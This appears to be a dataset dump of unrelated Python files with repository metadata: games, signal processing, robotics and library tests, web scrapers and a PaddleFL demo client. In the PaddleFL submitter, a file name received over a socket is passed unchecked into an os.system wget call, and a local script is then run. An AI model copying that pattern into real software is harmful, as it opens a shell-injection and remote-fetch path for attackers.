if len(playerBlob) - 1 == currentLevel['diamonds']:
levelIsSolved = True
if levelIsSolved:
drawLevel(currentLevelNumber, currentLevel)
print('Level complete!')
input('Press Enter to continue...')
currentLevelNumber = (currentLevelNumber + 1) % len(ALL_LEVELS)
currentLevel = copy.copy(ALL_LEVELS[currentLevelNumber])
undoStack = [copy.copy(currentLevel)]
break # Don't carry out any remaining moves.
| [
"[email protected]"
] | |
02e1b1ac9d7ca0fcf0fa59318c57df5d46403f9d | 16809bf25066488f2f32f154dadef3e30c68ae68 | /sine_wave.py | 0ed35aeb1f8d136868fdb4c3053a10605cc1bcdf | [] | no_license | aidiary/signal_processing | 0db6d1a9662ccd0fe232ccc461e9b27174c8ef88 | 4c1cb8ceee3a1527f38b8dbf9ffa1a737d06b577 | refs/heads/master | 2021-01-13T03:44:32.721301 | 2016-12-23T13:40:10 | 2016-12-23T13:40:10 | 77,221,395 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,762 | py | #coding: utf-8
import wave
import struct
import numpy as np
from pylab import *
def createSineWave(A, f0, fs, length):
    """Create and return a sine wave with amplitude A, fundamental frequency f0,
    sampling frequency fs, and a duration of `length` seconds."""
    data = []
    # Build the wave as floats in the range [-1.0, 1.0]
    for n in arange(length * fs):  # n is the sample index
        s = A * np.sin(2 * np.pi * f0 * n / fs)
        # Clip samples whose amplitude is too large
        if s > 1.0: s = 1.0
        if s < -1.0: s = -1.0
        data.append(s)
    # Convert to integer values in [-32768, 32767]
    data = [int(x * 32767.0) for x in data]
    # plot(data[0:100]); show()
    # Pack into binary
    data = struct.pack("h" * len(data), *data)  # the * unpacks the list into arguments
    return data
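# Size sanity check (sketch): with the 16-bit packing above, one second of
# audio at fs = 8000 Hz is 8000 samples, i.e. len(data) == 16000 bytes.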
def play(data, fs, bit):
    import pyaudio
    # Open an output stream
    p = pyaudio.PyAudio()
    stream = p.open(format=pyaudio.paInt16,
                    channels=1,
                    rate=int(fs),
                    output=True)
    # Play the audio by writing it to the stream one chunk at a time
    chunk = 1024
    sp = 0  # playback position pointer
    buffer = data[sp:sp+chunk]
    while buffer != '':
        stream.write(buffer)
        sp = sp + chunk
        buffer = data[sp:sp+chunk]
    stream.close()
    p.terminate()
def save(data, fs, bit, filename):
"""波形データをWAVEファイルへ出力"""
wf = wave.open(filename, "w")
wf.setnchannels(1)
wf.setsampwidth(bit / 8)
wf.setframerate(fs)
wf.writeframes(data)
wf.close()
if __name__ == "__main__" :
data = createSineWave(0.25, 250, 8000.0, 1.0)
play(data, 8000, 16)
save(data, 8000, 16, "sine.wav")
| [
"[email protected]"
] | |
deb27eae24f4cd46475211751438e904854e037a | fcdfe976c9ed60b18def889692a17dc18a8dd6d7 | /ros/py_ros/kdl_test2.py | 120f3dc29d4eeaee751accf468dd08397df344f3 | [] | no_license | akihikoy/ay_test | 4907470889c9bda11cdc84e8231ef3156fda8bd7 | a24dfb720960bfedb94be3b4d147e37616e7f39a | refs/heads/master | 2023-09-02T19:24:47.832392 | 2023-08-27T06:45:20 | 2023-08-27T06:45:20 | 181,903,332 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,517 | py | #!/usr/bin/python
#\file kdl_test2.py
#\brief certain python script
#\author Akihiko Yamaguchi, [email protected]
#\version 0.1
import numpy as np
from kdl_kin import TKinematics
if __name__=='__main__':
np.set_printoptions(precision=3)
print 'Testing TKinematics (robot_description == Yaskawa Motoman is assumed).'
print 'Before executing this script, run:'
print ' rosparam load `rospack find motoman_sia10f_support`/urdf/sia10f.urdf robot_description'
kin= TKinematics(end_link='link_t')
kin.print_robot_description()
DoF= len(kin.joint_names)
q0= [0.0]*DoF
angles= {joint:q0[j] for j,joint in enumerate(kin.joint_names)} #Deserialize
x0= kin.forward_position_kinematics(angles)
  print 'q0=',np.array(q0)
print 'x0= FK(q0)=',x0
import random
q1= [3.0*(random.random()-0.5) for j in range(DoF)]
angles= {joint:q1[j] for j,joint in enumerate(kin.joint_names)} #Deserialize
x1= kin.forward_position_kinematics(angles)
print 'q1=',q1
print 'x1= FK(q1)=',x1
seed= [0.0]*DoF
#seed= [3.0*(random.random()-0.5) for j in range(DoF)]
q2= kin.inverse_kinematics(x1[:3], x1[3:], seed=seed, maxiter=2000, eps=1.0e-4) #, maxiter=500, eps=1.0e-6
print 'q2= IK(x1)=',q2
if q2 is not None:
angles= {joint:q2[j] for j,joint in enumerate(kin.joint_names)} #Deserialize
x2= kin.forward_position_kinematics(angles)
print 'x2= FK(q2)=',x2
print 'x2==x1?', np.allclose(x2,x1)
print '|x2-x1|=',np.linalg.norm(x2-x1)
else:
print 'Failed to solve IK.'
| [
"[email protected]"
] | |
862323cdd250fded22470d58b5b961390e8c4680 | 88748ec85d537e4b50ba45a255a0dcc3c154116f | /tests/unit/test_poll.py | 2810d41f352a9741f36504ab9e9b2f71976b5c96 | [
"MIT"
] | permissive | byrgazov/vanilla | 17c53843b1b2f6b5484e4ff8e2fab54123245cc0 | 2896ae049d9e58ef3b4008a869ebf481951d0780 | refs/heads/master | 2020-07-30T12:30:04.497223 | 2020-07-24T10:08:03 | 2020-07-24T10:08:03 | 210,235,284 | 0 | 0 | MIT | 2019-09-23T00:49:06 | 2019-09-23T00:49:06 | null | UTF-8 | Python | false | false | 1,731 | py | import os
import vanilla.poll
class TestPoll(object):
def test_poll(self):
poll = vanilla.poll.Poll()
r, w = os.pipe()
poll.register(r, vanilla.poll.POLLIN)
assert poll.poll(timeout=0) == []
os.write(w, '1')
assert poll.poll() == [(r, vanilla.poll.POLLIN)]
# test event is cleared
assert poll.poll(timeout=0) == []
# test event is reset on new write after read
assert os.read(r, 4096) == '1'
assert poll.poll(timeout=0) == []
os.write(w, '2')
assert poll.poll() == [(r, vanilla.poll.POLLIN)]
assert poll.poll(timeout=0) == []
# test event is reset on new write without read
os.write(w, '3')
assert poll.poll() == [(r, vanilla.poll.POLLIN)]
assert poll.poll(timeout=0) == []
assert os.read(r, 4096) == '23'
def test_write_close(self):
poll = vanilla.poll.Poll()
r, w = os.pipe()
poll.register(r, vanilla.poll.POLLIN)
poll.register(w, vanilla.poll.POLLOUT)
assert poll.poll() == [(w, vanilla.poll.POLLOUT)]
assert poll.poll(timeout=0) == []
os.close(w)
assert poll.poll() == [(r, vanilla.poll.POLLERR)]
assert poll.poll(timeout=0) == []
def test_read_close(self):
poll = vanilla.poll.Poll()
r, w = os.pipe()
poll.register(r, vanilla.poll.POLLIN)
poll.register(w, vanilla.poll.POLLOUT)
assert poll.poll() == [(w, vanilla.poll.POLLOUT)]
assert poll.poll(timeout=0) == []
os.close(r)
got = poll.poll()
assert got == [(w, vanilla.poll.POLLOUT), (w, vanilla.poll.POLLERR)]
assert poll.poll(timeout=0) == []
| [
"[email protected]"
] | |
c008d92d5264518d006a4ff9b43acef4f19e4c38 | 30b004cad2c14b47b5f66c3a4a0015e05ca4a27e | /contrib/data_safety_training/image_classification/submitter.py | 920b60ad8fed2d7ff0b13d17001d8227f3b0abb8 | [
"Apache-2.0"
] | permissive | PaddlePaddle/PaddleFL | 66c26f774eeadc25c12e74056ac389e0c1f61b84 | dcc00c5dff62c3dd0092801f4e9b89d8c0957d3d | refs/heads/master | 2023-08-07T22:05:24.806573 | 2023-03-21T01:15:10 | 2023-03-21T01:15:10 | 210,873,203 | 486 | 136 | Apache-2.0 | 2023-07-26T22:30:57 | 2019-09-25T15:01:39 | Python | UTF-8 | Python | false | false | 1,090 | py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import zmq
import socket
import msgpack
import os
mission_dict = {"mission": "image classification", "image_size": [3, 32, 32]}
#send request
context = zmq.Context()
zmq_socket = context.socket(zmq.REQ)
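# A REQ socket enforces a strict send/recv alternation with its REP peer,
# which is why the first send() below is answered by a recv() before the
# final send().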
zmq_socket.connect("tcp://127.0.0.1:60001")
zmq_socket.send(msgpack.dumps(mission_dict))
#get and download encoder
file = zmq_socket.recv()
os.system("wget 127.0.0.1:8080/{}".format(file))
#data encoding
os.system("python -u user.py > user.log")
zmq_socket.send("complete")
| [
"[email protected]"
] | |
a31688d8579cfce253b6dac4f680333340f6b0e4 | 0bde5f7f09aa537ed1f4828d4e5ebee66475918f | /h2o-py/tests/testdir_sklearn/pyunit_sklearn_params.py | 2a70a91baafd68393e95b43969166ffea1f8a2ea | [
"Apache-2.0"
] | permissive | Winfredemalx54/h2o-3 | d69f1c07e1f5d2540cb0ce5e6073415fa0780d32 | dfb163c82ff3bfa6f88cdf02465a9bb4c8189cb7 | refs/heads/master | 2022-12-14T08:59:04.109986 | 2020-09-23T08:36:59 | 2020-09-23T08:36:59 | 297,947,978 | 2 | 0 | Apache-2.0 | 2020-09-23T11:28:54 | 2020-09-23T11:28:54 | null | UTF-8 | Python | false | false | 7,702 | py | from __future__ import print_function
import os, sys
from sklearn.pipeline import Pipeline
from h2o.sklearn import H2OAutoMLEstimator, H2OGradientBoostingEstimator, H2OScaler, H2OPCA
sys.path.insert(1, os.path.join("..",".."))
from tests import pyunit_utils
seed = 2019
def test_all_params_are_visible_in_get_params():
pipeline = Pipeline([
('standardize', H2OScaler(center=True, scale=False)),
('pca', H2OPCA(k=2, seed=seed)),
('estimator', H2OGradientBoostingEstimator(ntrees=20, max_depth=5, seed=seed))
])
params = pipeline.get_params()
assert isinstance(params['standardize'], H2OScaler)
assert params['standardize__center'] is True
assert params['standardize__scale'] is False
assert isinstance(params['pca'], H2OPCA)
assert params['pca__k'] == 2
assert params['pca__seed'] == seed
assert isinstance(params['estimator'], H2OGradientBoostingEstimator)
assert params['estimator__ntrees'] == 20
assert params['estimator__max_depth'] == 5
assert params['estimator__seed'] == seed
# also the ones that were not set explicitly
assert params['pca__max_iterations'] is None
assert params['estimator__learn_rate'] is None
def test_all_params_can_be_set_using_set_params():
pipeline = Pipeline([
('standardize', H2OScaler()),
('pca', H2OPCA()),
('estimator', H2OGradientBoostingEstimator())
])
pipeline.set_params(
standardize__center=True,
standardize__scale=False,
pca__k=2,
pca__seed=seed,
estimator__ntrees=20,
estimator__max_depth=5,
estimator__seed=seed
)
assert isinstance(pipeline.named_steps.standardize, H2OScaler)
assert pipeline.named_steps.standardize.center is True
assert pipeline.named_steps.standardize.scale is False
assert isinstance(pipeline.named_steps.pca, H2OPCA)
assert pipeline.named_steps.pca.k == 2
assert pipeline.named_steps.pca.seed == seed
assert isinstance(pipeline.named_steps.estimator, H2OGradientBoostingEstimator)
assert pipeline.named_steps.estimator.ntrees == 20
assert pipeline.named_steps.estimator.max_depth == 5
assert pipeline.named_steps.estimator.seed == seed
def test_all_params_are_accessible_as_properties():
pipeline = Pipeline([
('standardize', H2OScaler(center=True, scale=False)),
('pca', H2OPCA(k=2, seed=seed)),
('estimator', H2OGradientBoostingEstimator(ntrees=20, max_depth=5, seed=seed))
])
assert isinstance(pipeline.named_steps.standardize, H2OScaler)
assert pipeline.named_steps.standardize.center is True
assert pipeline.named_steps.standardize.scale is False
assert isinstance(pipeline.named_steps.pca, H2OPCA)
assert pipeline.named_steps.pca.k == 2
assert pipeline.named_steps.pca.seed == seed
assert isinstance(pipeline.named_steps.estimator, H2OGradientBoostingEstimator)
assert pipeline.named_steps.estimator.ntrees == 20
assert pipeline.named_steps.estimator.max_depth == 5
assert pipeline.named_steps.estimator.seed == seed
# also the ones that were not set explicitly
assert pipeline.named_steps.pca.max_iterations is None
assert pipeline.named_steps.estimator.learn_rate is None
def test_all_params_can_be_set_as_properties():
pipeline = Pipeline([
('standardize', H2OScaler()),
('pca', H2OPCA()),
('estimator', H2OGradientBoostingEstimator())
])
pipeline.named_steps.standardize.center = True
pipeline.named_steps.standardize.scale = False
pipeline.named_steps.pca.k = 2
pipeline.named_steps.pca.seed = seed
pipeline.named_steps.estimator.ntrees = 20
pipeline.named_steps.estimator.max_depth = 5
pipeline.named_steps.estimator.seed = seed
params = pipeline.get_params()
assert isinstance(params['standardize'], H2OScaler)
assert params['standardize__center'] is True
assert params['standardize__scale'] is False
assert isinstance(params['pca'], H2OPCA)
assert params['pca__k'] == 2
assert params['pca__seed'] == seed
assert isinstance(params['estimator'], H2OGradientBoostingEstimator)
assert params['estimator__ntrees'] == 20
assert params['estimator__max_depth'] == 5
assert params['estimator__seed'] == seed
def test_params_conflicting_with_sklearn_api_are_still_available():
pca = H2OPCA()
assert pca.transform != 'NONE'
assert callable(pca.transform), "`transform` method from sklearn API has been replaced by a property"
# conflicting param can be accessed normally using get_params()
assert pca.get_params()['transform'] == 'NONE'
# property is accessible directly using a trailing underscore
assert pca.transform_ == 'NONE'
pca = H2OPCA(transform='DEMEAN')
assert callable(pca.transform), "`transform` method from sklearn API has been replaced by a property"
assert pca.get_params()['transform'] == 'DEMEAN'
assert pca.transform_ == 'DEMEAN'
# conflicting param can be modified normally using set_params()
pca.set_params(transform='DESCALE')
assert pca.get_params()['transform'] == 'DESCALE'
assert pca.transform_ == 'DESCALE'
# conflicting property can be set directly using a trailing underscore
pca.transform_ = 'NORMALIZE'
assert pca.get_params()['transform'] == 'NORMALIZE'
assert pca.transform_ == 'NORMALIZE'
def test_params_are_correctly_passed_to_underlying_transformer():
pca = H2OPCA(seed=seed)
pca.set_params(transform='DEMEAN', k=3)
pca.model_id = "dummy"
assert pca.estimator is None
pca._make_estimator() # normally done when calling `fit`
assert pca.estimator
parms = pca.estimator._parms
assert parms['seed'] == seed
assert parms['transform'] == 'DEMEAN'
assert parms['k'] == 3
assert parms['model_id'] == "dummy"
assert parms['max_iterations'] is None
def test_params_are_correctly_passed_to_underlying_estimator():
estimator = H2OGradientBoostingEstimator(seed=seed)
estimator.set_params(max_depth=10, learn_rate=0.5)
estimator.model_id = "dummy"
assert estimator.estimator is None
estimator._make_estimator() # normally done when calling `fit`
real_estimator = estimator.estimator
assert real_estimator
parms = real_estimator._parms
assert real_estimator.seed == parms['seed'] == seed
assert real_estimator.max_depth == parms['max_depth'] == 10
assert real_estimator.learn_rate == parms['learn_rate'] == 0.5
assert real_estimator._id == parms['model_id'] == "dummy"
assert real_estimator.training_frame == parms['training_frame'] is None
def test_params_are_correctly_passed_to_underlying_automl():
estimator = H2OAutoMLEstimator(seed=seed)
estimator.set_params(max_models=5, nfolds=0)
estimator.project_name = "dummy"
assert estimator.estimator is None
estimator._make_estimator() # normally done when calling `fit`
aml = estimator.estimator
assert aml
assert aml.build_control["stopping_criteria"]["seed"] == seed
assert aml.build_control["stopping_criteria"]["max_models"] == 5
assert aml.build_control["nfolds"] == 0
assert aml.build_control["project_name"] == "dummy"
pyunit_utils.run_tests([
test_all_params_are_visible_in_get_params,
test_all_params_can_be_set_using_set_params,
test_all_params_are_accessible_as_properties,
test_all_params_can_be_set_as_properties,
test_params_conflicting_with_sklearn_api_are_still_available,
test_params_are_correctly_passed_to_underlying_transformer,
test_params_are_correctly_passed_to_underlying_estimator,
test_params_are_correctly_passed_to_underlying_automl,
])
| [
"[email protected]"
] | |
e9d1caab6dde00c07ce3832efe253d9348ac4a88 | 940dcf18bb1db19610e29902c78ec703690c4297 | /pygame/py002.py | 17a13a71d3e9bdeacc203460516516e052a3e799 | [] | no_license | Sahil4UI/PythonRegular11-12Dec2020 | dc20e8d13d191801301d18d5b92f5775fe9c0674 | 0b22b1d8c703ac21a1f02c2b10f327bcb2e96460 | refs/heads/main | 2023-02-27T13:00:22.415199 | 2021-01-31T06:57:58 | 2021-01-31T06:57:58 | 318,424,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,076 | py | import random
import pygame
import time
from pygame.locals import *
pygame.init()
H= 600
W=800
gameScreen= pygame.display.set_mode((W,H))
color= (255,255,255)
red = (255 , 0 , 0 )
blue = (0,0,255)
w=30
h=30
pygame.time.set_timer(USEREVENT,1000)
frog=pygame.image.load("frog.png")#raw string-path
frog = pygame.transform.scale(frog,(50,50))
audio = pygame.mixer.Sound("point.wav")
def Score(counter):
font=pygame.font.SysFont(None,30)
#anti aliasing ->texture-> True
text=font.render(f"Score : {counter}",True,blue)
gameScreen.blit(text,(10,10))
def Snake(snakeList):
for i in snakeList:
pygame.draw.rect(gameScreen,red,[i[0],i[1],w,h])
def Timer(sec):
font=pygame.font.SysFont(None,30)
#anti aliasing ->texture-> True
text=font.render(f"Time Left : {sec} seconds",True,blue)
gameScreen.blit(text,(500,10))
def gameOver():
pass
# font=pygame.font.SysFont(None,30)
# #anti aliasing ->texture-> True
# text=font.render(f"***GAME OVER***",True,blue)
# gameScreen.blit(text,(500,10))
def main():
movex = 0
movey = 0
frogX = random.randint(0,W-50)
frogY = random.randint(0,H-50)
x=0
y=0
sec=20
counter=0
snakeList= []
snakeLength=1
while True:
gameScreen.fill(color)
for event in pygame.event.get():
if event.type==pygame.QUIT:
pygame.quit()
quit()
elif event.type==pygame.USEREVENT:
sec-=1
if event.type==pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
movex=-1
movey=0
elif event.key == pygame.K_RIGHT:
movex=1
movey=0
elif event.key==pygame.K_UP:
movey=-1
movex=0
elif event.key==pygame.K_DOWN:
movey=1
movex=0
# gameScreen.blit(image,(imageX,imageY))
snake = pygame.draw.rect(gameScreen,red,[x,y,w,h])
snakeList.append([x,y])
Snake(snakeList)
frogRect = pygame.Rect([frogX,frogY,50,50])
gameScreen.blit(frog,(frogX,frogY))
x += movex
y += movey
if x>W-w:
movex=-1
elif x<0:
movex=1
if y>H-h:
movey=-1
elif y<0:
movey=1
Score(counter)
Timer(sec)
if sec <0:
gameOver()
if snakeLength<len(snakeList):
del snakeList[0]
if snake.colliderect(frogRect):
frogX = random.randint(0,W-50)
frogY = random.randint(0,H-50)
counter+=1
audio.play()
snakeLength+=20
pygame.display.update()
main()
| [
"[email protected]"
] | |
b540a1018ada187e4e6e105e8d050f936df3061b | f416ab3adfb5c641dc84022f918df43985c19a09 | /problems/advent-of-code/2022/05/sol2.py | 78cf7599b31d96f7b01fd8ad778ed956290eda79 | [] | no_license | NicoKNL/coding-problems | a4656e8423e8c7f54be1b9015a9502864f0b13a5 | 4c8c8d5da3cdf74aefcfad4e82066c4a4beb8c06 | refs/heads/master | 2023-07-26T02:00:35.834440 | 2023-07-11T22:47:13 | 2023-07-11T22:47:13 | 160,269,601 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,530 | py | import sys
def splitInput(lines):
stack_data = []
moves = []
parsing_stack = True
for line in lines:
if not line:
parsing_stack = False
continue
if parsing_stack:
stack_data.append(line)
else:
moves.append(line)
stack_count = int(stack_data[-1].split()[-1])
return stack_count, stack_data[:-1], moves
def parseStacks(count, data):
stacks = [[] for _ in range(count)]
for row in data:
print(row)
for i, c in enumerate(range(1, len(row), 4)):
if row[c].strip():
stacks[i].append(row[c])
stacks = [stack[::-1] for stack in stacks]
return stacks
def parseMoves(moves):
for i in range(len(moves)):
words = moves[i].split()
move = [words[1], words[3], words[5]] # [count, from, to]
move = list(map(int, move))
move[1] -= 1 # Use 0 based indexing
move[2] -= 1
moves[i] = move
def execute(moves, stacks):
for (count, s, t) in moves:
stacks[t].extend(stacks[s][-count:])
stacks[s] = stacks[s][:-count]
if __name__ == "__main__":
lines = [l[:-1] for l in sys.stdin]
stack_count, stack_data, moves = splitInput(lines)
stacks = parseStacks(stack_count, stack_data)
parseMoves(moves)
execute(moves, stacks)
answer = [" " for _ in range(stack_count)]
for i, stack in enumerate(stacks):
if stack:
answer[i] = stack[-1]
print("".join(answer))
| [
"[email protected]"
] | |
37be2dd7a036a0d6c20d49738fb4226536c20ac2 | ff21f04b692891b13fa2ed49293e5d99fea742db | /hunt/scripts/job_spider.py | 41015307bdb3af0ba459f972c27a7bd7b13714fd | [] | no_license | yangby-cryptape/job-hunter | 3caf49c9290a077661c8e245565132e2a8671c05 | 1b58b2f23ac7d1aba08feaff29692adb8fe58161 | refs/heads/master | 2021-05-27T17:35:09.370516 | 2012-06-25T07:38:06 | 2012-06-25T07:38:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,263 | py | #!/usr/bin/env python
#coding=utf-8
import hashlib, urllib2, time, re
from datetime import datetime
from pyquery import PyQuery as pq
from models import db, Occupational, Job, Company
def get_headers(gzip=False):
headers = {
"User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13",
# "User-Agent": "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13"
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"zh-cn,zh;q=0.5",
# "Accept-Encoding":"gzip,deflate",
"Accept-Charset":"utf-8;q=0.7,*;q=0.7",
"Keep-Alive":"115",
"Connection":"keep-alive",
# "Host":"",
# "Referer":"",
}
if gzip:
headers["Accept-Encoding"] = "gzip,deflate"
return headers
def getDomFromUrl(url):
req = urllib2.Request(
url = url,
headers = get_headers())
try:
request = urllib2.urlopen(req)
source = request.read()
request.close()
    except Exception, e:
        print e
        return None  # the fetch failed, so there is no page to parse
ucontent = source.decode('utf-8')
dom = pq(ucontent)
return dom
def getCompanyInfo(dom):
    '''Fetch the information for a single company.'''
info_items = dom('.companyInfoItems')
info_trs = info_items('.companyInfoTab tr')
company_info = {}
for tr in info_trs:
tr = pq(tr)
k = tr('td:eq(0)').text().split(u':')[0]
v = tr('td:eq(1)').text()
company_info[k] = v
scale = company_info.get(u'公司规模')
if scale:
sh = re.search(r'(\d+)-(\d+)', scale)
scale = sh.groups() if sh else (None, None)
else:
scale = (None, None)
####
jcs = dom('.jobContact>div>div').find('div') # Job Contact
for jc in jcs:
jc = pq(jc)
jctext = jc.text().split(u':')
if len(jctext) == 2:
k, v = jctext
company_info[k] = v
com = Company()
com.name = info_items('.companyTitle').text()
com.industry = company_info.get(u'公司行业')
com.type = company_info.get(u'公司类型')
com.address = company_info.get(u'公司地址')
com.website = company_info.get(u'公司主页')
com.scale_low, com.scale_high = scale
com.email = None
com.phone_num = None
com.description = dom('.black12 tr:eq(2)').find('td').html()
com.etag = ''
return com
def getJobInfo(dom, company):
    '''Fetch the recruitment details for a single job posting.'''
job_info = {}
type_tr = dom('.jobInfoItems tr:eq(0)')
trtext = type_tr.text()
trtext = trtext.split(u':') if trtext else []
if len(trtext) == 2:
k, v = trtext
v = v.replace('/', ',')
job_info[k] = v
trs = dom('.jobInfoItems tr:gt(1)')
for tr in trs:
tr = pq(tr)
tds = tr('td')
for td in tds:
td = pq(td)
tdtext = td.text().split(u':')
if len(tdtext) == 2:
k, v = tdtext
job_info[k] = v
salary = job_info.get(u'职位月薪')
if salary:
sh = re.search(r'(\d+)-(\d+)', salary)
salary = sh.groups() if sh else (None, None)
else:
salary = (None, None)
quantity = job_info.get(u'招聘人数')
if quantity:
sh = re.search(r'(\d+)', quantity)
quantity = sh.group(0) if sh else None
job = Job()
occ_type = job_info.get(u'职位类别')
occ = Occupational.query.filter(Occupational.type==occ_type).first()
if not occ:
occ = Occupational()
occ.name = 'FILL'
occ.type = occ_type
db.session.add(occ)
job.occupational = occ
job.type = job_info.get(u'工作性质')
job.exp = job_info.get(u'工作经验')
job.manage_exp = job_info.get(u'管理经验')
job.quantity = quantity
job.degree = job_info.get(u'最低学历')
job.salary_low, job.salary_high = salary
job.description = dom('.jobDes').html()
job.etag = ''
return job
def getPage(page_num):
time.sleep(0.6)
dom = getDomFromUrl('http://sou.zhaopin.com/jobs/jobsearch_jobtype.aspx?bj=160000&sj=045%3B079&jl=%E6%9D%AD%E5%B7%9E&sb=1&sm=0&p=' + page_num)
table = dom('#contentbox table:eq(1)')
trs = table('tr:gt(0)')
iseven = True
for tr in trs:
if iseven:
tr = pq(tr)
job_title = tr('#dvJobTit').text()
job_url = tr('#dvJobTit a').attr('href')
company_name = tr('#dvCompNM').text()
company_url = tr('#dvCompNM a').attr('href')
work_place = tr('td:eq(4)').text().split(' - ')
work_city = work_place[0]
work_area = work_place[1] if len(work_place) > 1 else None
public_date = tr('td:eq(5)').text()
time.sleep(0.6)
job_detail_dom = getDomFromUrl(job_url)
company = getCompanyInfo(job_detail_dom)
company.zhaopin_url = company_url
db.session.add(company)
job = getJobInfo(job_detail_dom, company)
job.company = company
job.title = job_title
job.work_city = work_city
job.work_area = work_area
job.public_date = public_date
job.zhaopin_url = job_url
db.session.add(job)
db.session.commit()
print datetime.now()
print 'This is Job %d' % job.id
iseven = not iseven
total_page = dom('.pagehead .num:eq(1)').text()
sh = re.search(r'(\d+)/(\d+)', total_page)
current_page, total_page = sh.groups() if sh else (None, None)
return int(current_page), int(total_page)
def doSpider():
print datetime.now()
print 'Start Get First page'
current_page, total_page = getPage('1')
print 'First page, Done!'
print 'Total page: %d\n' % total_page
for page_num in range(current_page+1, total_page+1):
print datetime.now()
print 'Start get page: [%d]' % page_num
getPage(str(page_num))
print 'page: [%d], Done!\n' % page_num
if __name__ == '__main__':
print 'BEGIN TEST'
doSpider()
print 'TEST DONE'
| [
"[email protected]"
] | |
521ea38335f0c6bebf7ef64a8d68203c32de69dc | f97cabce5c91238678e159387f03636d4deb90fb | /dajare/crawler_kaishaseikatsu_jp.py | c0bb1bb7c7b5cf459ec22cf9603ddf779b6d4b93 | [] | no_license | vaaaaanquish/dajare-python | 1daa8b4d31a9e3d5e1336d3b31693c1d491ed814 | 150132cef0333a94c9e286c4241af92c630cd7bd | refs/heads/master | 2022-12-10T08:46:42.827279 | 2020-12-11T03:28:54 | 2020-12-11T03:28:54 | 242,304,312 | 16 | 3 | null | 2022-12-08T03:43:06 | 2020-02-22T08:09:23 | Jupyter Notebook | UTF-8 | Python | false | false | 1,010 | py | from tqdm import tqdm
from dajare.crawler import Crawler
class CrawlerKaishaseikatsuJp(Crawler):
def run(self):
output_list = self._run()
self.output(output_list, 'dajare_kaishaseikatsu_jp.json')
def _run(self):
output_list = []
for i in tqdm(range(0, 2200, 100)):
url = f'http://archives.kaishaseikatsu.jp/cgi-bin/kaisha2/board_r.cgi?type=kaisha_dajare&next={i}&range=100'
bs = self.get_bs(url, encoding='shift-jis')
for x in bs.find_all('tr', bgcolor="#FBFFB2"):
output_list.append({
'text': x.find('td').text,
'url': url,
'author': 'kaishaseikatsu',
'author_link': 'http://archives.kaishaseikatsu.jp',
'mean_score': 0.,
'deviation_score': 0.,
'category': [],
'tag': [],
'eval_list': []
})
return output_list
| [
"[email protected]"
] | |
89a33a2d2fb2a28b98436986b935fd4cbc7f20a7 | 37fef592f365194c28579f95abd222cc4e1243ae | /streamlit/venv/venv/lib/python3.7/site-packages/plotly/graph_objs/splom/marker/colorbar/_tickformatstop.py | a3a8adde9676f505e52d3465cbd3ee72ce684873 | [] | no_license | edimaudo/Python-projects | be61e0d3fff63fb7bd00513dbf1401e2c1822cfb | 85d54badf82a0b653587a02e99daf389df62e012 | refs/heads/master | 2023-04-07T03:26:23.259959 | 2023-03-24T12:03:03 | 2023-03-24T12:03:03 | 72,611,253 | 4 | 3 | null | 2022-10-31T18:10:41 | 2016-11-02T06:37:17 | null | UTF-8 | Python | false | false | 9,564 | py | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Tickformatstop(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "splom.marker.colorbar"
_path_str = "splom.marker.colorbar.tickformatstop"
_valid_props = {"dtickrange", "enabled", "name", "templateitemname", "value"}
# dtickrange
# ----------
@property
def dtickrange(self):
"""
range [*min*, *max*], where "min", "max" - dtick values which
describe some zoom level, it is possible to omit "min" or "max"
value by passing "null"
The 'dtickrange' property is an info array that may be specified as:
* a list or tuple of 2 elements where:
(0) The 'dtickrange[0]' property accepts values of any type
(1) The 'dtickrange[1]' property accepts values of any type
Returns
-------
list
"""
return self["dtickrange"]
@dtickrange.setter
def dtickrange(self, val):
self["dtickrange"] = val
# enabled
# -------
@property
def enabled(self):
"""
Determines whether or not this stop is used. If `false`, this
stop is ignored even within its `dtickrange`.
The 'enabled' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["enabled"]
@enabled.setter
def enabled(self, val):
self["enabled"] = val
# name
# ----
@property
def name(self):
"""
When used in a template, named items are created in the output
figure in addition to any items the figure already has in this
array. You can modify these items in the output figure by
making your own item with `templateitemname` matching this
`name` alongside your modifications (including `visible: false`
or `enabled: false` to hide it). Has no effect outside of a
template.
The 'name' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["name"]
@name.setter
def name(self, val):
self["name"] = val
# templateitemname
# ----------------
@property
def templateitemname(self):
"""
Used to refer to a named item in this array in the template.
Named items from the template will be created even without a
matching item in the input figure, but you can modify one by
making an item with `templateitemname` matching its `name`,
alongside your modifications (including `visible: false` or
`enabled: false` to hide it). If there is no template or no
matching item, this item will be hidden unless you explicitly
show it with `visible: true`.
The 'templateitemname' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["templateitemname"]
@templateitemname.setter
def templateitemname(self, val):
self["templateitemname"] = val
# value
# -----
@property
def value(self):
"""
string - dtickformat for described zoom level, the same as
"tickformat"
The 'value' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["value"]
@value.setter
def value(self, val):
self["value"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
dtickrange
